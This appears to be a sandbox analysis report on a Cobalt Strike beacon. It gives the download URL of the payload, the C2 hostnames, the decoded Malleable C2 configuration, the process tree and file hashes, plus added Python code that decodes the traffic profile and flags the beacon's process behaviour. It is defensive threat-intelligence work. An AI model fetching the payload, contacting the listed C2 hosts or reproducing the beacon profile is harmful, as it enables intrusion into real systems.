Analysis

  • max time kernel
    103s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    08-12-2020 12:27

General

  • Target

    http://45.141.84.182/cb.exe

  • Sample

    201208-1jtvenfkhs

Malware Config

Extracted

Family

cobaltstrike

C2

http://NuQuiedi8ezai5aHucei.cantusethis.fun:443/gifs/

http://Jae3Faita9jeiMeiVeiv.cantusethis.site:443/gifs/

http://ibee3sahkei7Ohcu9uGi.cantusethis.online:443/image/

Attributes
  • access_type

    512

  • beacon_type

    2048

  • create_remote_thread

    0

  • day

    0

  • dns_idle

    6.7373064e+07

  • dns_sleep

    8.1297408e+08

  • host

    NuQuiedi8ezai5aHucei.cantusethis.fun,/gifs/,Jae3Faita9jeiMeiVeiv.cantusethis.site,/gifs/,ibee3sahkei7Ohcu9uGi.cantusethis.online,/image/

  • http_header1

    AAAACgAAAB9BY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41AAAACgAAAFJBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsKi8qO3E9MC44AAAACgAAAB5BY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUAAAAKAAAAEUNvbm5lY3Rpb246IGNsb3NlAAAABwAAAAAAAAAPAAAADQAAAAEAAAALL2tpdHRlbi5naWYAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • http_header2

    AAAACgAAAB5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24AAAAKAAAAEUNvbm5lY3Rpb246IGNsb3NlAAAABwAAAAAAAAAPAAAACAAAAAYAAAAOQXV0aGVudGljYXRpb24AAAAHAAAAAQAAAAMAAAACAAAAc3siaW1hZ2VfdXJsIiA6ICJodHRwczovL3N1bjktMjMudXNlcmFwaS5jb20vRzRKdmRaREVmTGRJUGxOTjEtSmtNR1EydW5mMktFSVY1NE9tNWcvYWJKNzBqR0hmVmsuanBnIiwgIm1ldGFkYXRhIiA6ICIAAAABAAAAAiJ9AAAABAAAAAAAAA==

  • http_method1

    GET

  • http_method2

    POST

  • injection_process

  • jitter

    5120

  • maxdns

    235

  • month

    0

  • pipe_name

  • polling_time

    60000

  • port_number

    443

  • proxy_password

  • proxy_server

  • proxy_username

  • sc_process32

    %windir%\syswow64\dfrgui.exe

  • sc_process64

    %windir%\sysnative\dfrgui.exe

  • state_machine (label as emitted by the extractor; the value is the beacon's RSA public key, a base64 DER SubjectPublicKeyInfo zero-padded to the size of the config field)

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWJolZfZtN4+W4l2naPtrRPBZ9E6XqVyL8XSC08vwYVEtmn7iwPUgBQsddprki6QXEuQUro5OTw+ESzZzNrgOimS9DSimgnM8DroKyW8tQQgiPNHvIWyix4+fH7Ps7uEwr3o1nqPhEQHXYhmsHU/q73G6OxBHNR+OQDKaVgAg5bwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    3.2384e+09

  • unknown2

    AAAABAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAABAAAAAAgAAAEAAAAACAAAAQAAAAAIAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown3

    0

  • unknown4

    0

  • unknown5

    0

  • uri

    /temp/

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36

  • year

    0
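The http_header1 and http_header2 values above are Cobalt Strike's serialized Malleable C2 transform blocks, the client side of the profile's http-get and http-post sections: a sequence of big-endian 32-bit opcodes, each optionally followed by a length-prefixed string, terminated by a zero opcode and padded with zeros. The decoder below is an added example written for this page; it is not code from the sandbox or from the Cobalt Strike parsers whose opcode table it borrows (the numbering is the one documented by public beacon config parsers such as 1768.py, and the build-target names metadata, id and output are the profile's own). The two blobs are copied verbatim from the attributes above. Running it shows what this beacon actually puts on the wire: a GET whose metadata is masked, base64url-encoded, suffixed with /kitten.gif and appended to the URI, and a POST whose session id travels in an Authentication header while the output is base64-encoded inside a JSON image_url document.

```python
import base64
import struct

# Transform opcodes as recovered by public beacon config parsers (1768.py,
# SentinelOne CobaltStrikeParser).  Opcode 0 terminates the block.
OPCODES = {
    1: "append", 2: "prepend", 3: "base64", 4: "print", 5: "parameter",
    6: "header", 7: "build", 8: "netbios", 9: "const_parameter",
    10: "const_header", 11: "netbiosu", 12: "uri_append", 13: "base64url",
    14: "strrep", 15: "mask", 16: "const_host_header",
}
ONE_STRING = {"append", "prepend", "parameter", "header",
              "const_parameter", "const_header", "const_host_header"}
# "build N" names the profile block the following steps belong to; the
# numbering differs between the GET and POST halves of the profile.
BUILD_TARGETS = {"http-get": {0: "metadata"}, "http-post": {0: "id", 1: "output"}}

# Copied verbatim from the http_header1 / http_header2 attributes of this report.
HTTP_HEADER1 = "AAAACgAAAB9BY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41AAAACgAAAFJBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsKi8qO3E9MC44AAAACgAAAB5BY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUAAAAKAAAAEUNvbm5lY3Rpb246IGNsb3NlAAAABwAAAAAAAAAPAAAADQAAAAEAAAALL2tpdHRlbi5naWYAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
HTTP_HEADER2 = "AAAACgAAAB5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24AAAAKAAAAEUNvbm5lY3Rpb246IGNsb3NlAAAABwAAAAAAAAAPAAAACAAAAAYAAAAOQXV0aGVudGljYXRpb24AAAAHAAAAAQAAAAMAAAACAAAAc3siaW1hZ2VfdXJsIiA6ICJodHRwczovL3N1bjktMjMudXNlcmFwaS5jb20vRzRKdmRaREVmTGRJUGxOTjEtSmtNR1EydW5mMktFSVY1NE9tNWcvYWJKNzBqR0hmVmsuanBnIiwgIm1ldGFkYXRhIiA6ICIAAAABAAAAAiJ9AAAABAAAAAAAAA=="


def parse_transform(blob_b64, request):
    """Decode one serialized transform block.

    Returns {"request", "constants": [(kind, value)], "blocks": [(target, steps)]}
    where steps is a list of (step_name, argument) in wire order.
    """
    data = base64.b64decode(blob_b64)
    pos = 0

    def u32():
        nonlocal pos
        (value,) = struct.unpack_from(">I", data, pos)
        pos += 4
        return value

    def lstr():
        # length-prefixed string; latin-1 keeps any non-ASCII byte visible
        nonlocal pos
        n = u32()
        if pos + n > len(data):
            raise ValueError(f"string of {n} bytes overruns blob at offset {pos}")
        s = data[pos:pos + n].decode("latin-1")
        pos += n
        return s

    constants, blocks, steps = [], [], None
    while pos + 4 <= len(data):
        op = u32()
        if op == 0:            # terminator; the rest of the field is zero padding
            break
        name = OPCODES.get(op)
        if name is None:
            raise ValueError(f"unknown transform opcode {op} at offset {pos - 4}")
        if name == "build":
            steps = []
            blocks.append((BUILD_TARGETS[request].get(u32(), "unknown"), steps))
            continue
        if name in ONE_STRING:
            arg = lstr()
        elif name == "strrep":
            arg = (lstr(), lstr())
        else:
            arg = None
        if name.startswith("const_"):       # applies to every request, not to a build block
            constants.append((name[len("const_"):], arg))
        elif steps is None:
            raise ValueError(f"{name} appears before any build block")
        else:
            steps.append((name, arg))
    return {"request": request, "constants": constants, "blocks": blocks}


def to_profile(parsed):
    """Render the decoded block in Malleable C2 profile syntax."""
    lines = [f"{parsed['request']} {{", "    client {"]
    for kind, value in parsed["constants"]:
        if kind == "header":            # stored as "Name: value", written as two strings
            hdr, _, val = value.partition(": ")
            lines.append(f'        header "{hdr}" "{val}";')
        else:
            lines.append(f'        {kind.replace("_", "-")} "{value}";')
    for target, steps in parsed["blocks"]:
        lines.append(f"        {target} {{")
        for name, arg in steps:
            word = name.replace("_", "-")
            if arg is None:
                lines.append(f"            {word};")
            elif isinstance(arg, tuple):
                lines.append(f'            {word} "{arg[0]}" "{arg[1]}";')
            else:
                lines.append(f'            {word} "{arg}";')
        lines.append("        }")
    lines += ["    }", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    for blob, request in ((HTTP_HEADER1, "http-get"), (HTTP_HEADER2, "http-post")):
        print(to_profile(parse_transform(blob, request)))
```

The decoded profile is the network fingerprint to hunt for: GETs to the /gifs/ and /image/ paths whose last URI segment is base64url data followed by /kitten.gif, and POSTs carrying an Authentication header and a JSON body with image_url and metadata keys. Only the constant headers and these literals are fixed by the config; the User-Agent string alone is a weak match because it is a stock Chrome 80 value.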

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

  • Executes dropped EXE 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 52 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://45.141.84.182/cb.exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1304 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:4032
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\cb.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\cb.exe"
      2⤵
      • Executes dropped EXE
      PID:4044
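The process tree shows the delivery path: iexplore.exe fetched cb.exe into its INetCache directory and launched it from there. Combined with the sc_process32/sc_process64 values in the config (dfrgui.exe is the sacrificial process this beacon spawns for post-exploitation jobs), that gives two host-side detections worth encoding. The rule logic below is an added example written for this page, not Triage's signature code; the event records are constructed from the PIDs and paths in the report, while the dfrgui.exe follow-on (PID 5001) and the benign Explorer-launched dfrgui.exe (PID 6002) are hypothetical, since neither appears in this run.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (the fields a Sysmon EID 1 would carry)."""
    pid: int
    ppid: int
    image: str


BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
# Locations a standard user can write to; a parent living here is untrusted.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\programdata\\")
BROWSER_CACHE = ("\\inetcache\\", "\\temporary internet files\\")
# Basenames of the spawnto hosts from this report's sc_process32 / sc_process64.
SPAWNTO_HOSTS = {"dfrgui.exe"}


def basename(path):
    return ntpath.basename(path).lower()


def in_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def detect(events):
    """Return (pid, rule) pairs for every event that matches a rule."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        image = e.image.lower()
        # Rule 1: an executable run straight out of a browser cache by the browser.
        if any(m in image for m in BROWSER_CACHE) and basename(parent.image) in BROWSERS:
            alerts.append((e.pid, "exe-run-from-browser-cache"))
        # Rule 2: a known spawnto host whose parent lives in a user-writable path.
        # The config names %windir%\sysnative\dfrgui.exe, but sysnative is only a
        # view for 32-bit callers; the image path logged is System32, so match on
        # the basename and the parent's location rather than the configured string.
        if basename(e.image) in SPAWNTO_HOSTS and in_user_writable(parent.image):
            alerts.append((e.pid, "spawnto-host-from-untrusted-parent"))
    return alerts


# Constructed sample: PIDs 1304/4032/4044 and their paths come from the report;
# PIDs 1000, 5001 and 6002 are hypothetical.
SAMPLE_EVENTS = [
    ProcessEvent(1000, 800, r"C:\Windows\explorer.exe"),
    ProcessEvent(1304, 1000, r"C:\Program Files\Internet Explorer\iexplore.exe"),
    ProcessEvent(4032, 1304, r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"),
    ProcessEvent(4044, 1304,
                 r"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\cb.exe"),
    # Hypothetical follow-on: the beacon spawns its sacrificial process.
    ProcessEvent(5001, 4044, r"C:\Windows\System32\dfrgui.exe"),
    # Benign: the user opens "Defragment and Optimize Drives" from Explorer.
    ProcessEvent(6002, 1000, r"C:\Windows\System32\dfrgui.exe"),
]


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

Rule 2 fires on the parent's location, not on dfrgui.exe itself, which is what keeps the Explorer-launched copy quiet; in a real deployment the spawnto set should be fed from every extracted config, since operators change it per profile.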

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion
    Modify Registry (T1112): 2 signature hits


Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    9f43a9753eac12a88c486b481b742c4e

    SHA1

    337b612e0b28608732d86c9989cd94d52bce70ed

    SHA256

    f9ca88e6279827d156adcea97072aa0c2db454bec66b4af36ea18d88dee600e2

    SHA512

    7036877fed659318f155ea0af9898f97104ab821ff179c8f8e2032fe4df5e376f601a07f76e6fff41c1b1e2a99e6a8f57aad3d2e26ad253e5dff23e7818db656

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    a471261da72ce31b74d7d6c11f61a528

    SHA1

    0c06a65e4f02665cbf8c645f48ffefc3c52e0933

    SHA256

    c53f9d5c428aac669ac704b6d42fb6081ba1bac610d1ce6df0764ce4f8aff51c

    SHA512

    1ab5029d1c6ebe6a76568887554503c52606517efafdc5f9d92f98a3ef252b4d3027fd274b42052895ed2cc48fc3b4d16640cd47bd3ee5988950f1b9c10bb872

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\cb.exe
    MD5

    dbffcc741c54ae7632fb2807c888bdfe

    SHA1

    135fe840084973d099de68992de40224ed1680b9

    SHA256

    55c7a0ec28ac9319b3d2245882007c7c1f72b3f44970d24c6d5c355f993d1fb9

    SHA512

    eab651efd209dee4fb6137ecadfce58e4ecfd1cdcf767a28c02fefc62a814a08d97d81d942f3609a882b4b81767e322f1fea3c5d7688d2d7785a8f1f56e9ef4c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\C75WK71L\cb.exe.el0uohe.partial
    MD5

    dbffcc741c54ae7632fb2807c888bdfe

    SHA1

    135fe840084973d099de68992de40224ed1680b9

    SHA256

    55c7a0ec28ac9319b3d2245882007c7c1f72b3f44970d24c6d5c355f993d1fb9

    SHA512

    eab651efd209dee4fb6137ecadfce58e4ecfd1cdcf767a28c02fefc62a814a08d97d81d942f3609a882b4b81767e322f1fea3c5d7688d2d7785a8f1f56e9ef4c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\F46QYU7W.cookie
    MD5

    f6864e2861fe09e02689e91858dc4f2a

    SHA1

    f2a74aae50ec2462b4fc25c2a0de1550e64fecef

    SHA256

    d2a98d3e8e3906bd0348eaf49dd157e77ec9fc8f5cad5bf4be4d29d1b96e85a6

    SHA512

    c5025a12793c72bc77f4786c9db1e9c2a5e271c3c8328bd3f852030807aa81b5275c650ddd56dd49e101774d4146d3d6013e8a3f03c76c6458de3d1bc933f058

  • memory/4032-2-0x0000000000000000-mapping.dmp
  • memory/4044-7-0x0000000000000000-mapping.dmp
  • memory/4044-9-0x0000022F057A0000-0x0000022F059AF000-memory.dmp
    Filesize

    2.1MB

  • memory/4044-10-0x0000022F057A0000-0x0000022F059AF000-memory.dmp
    Filesize

    2.1MB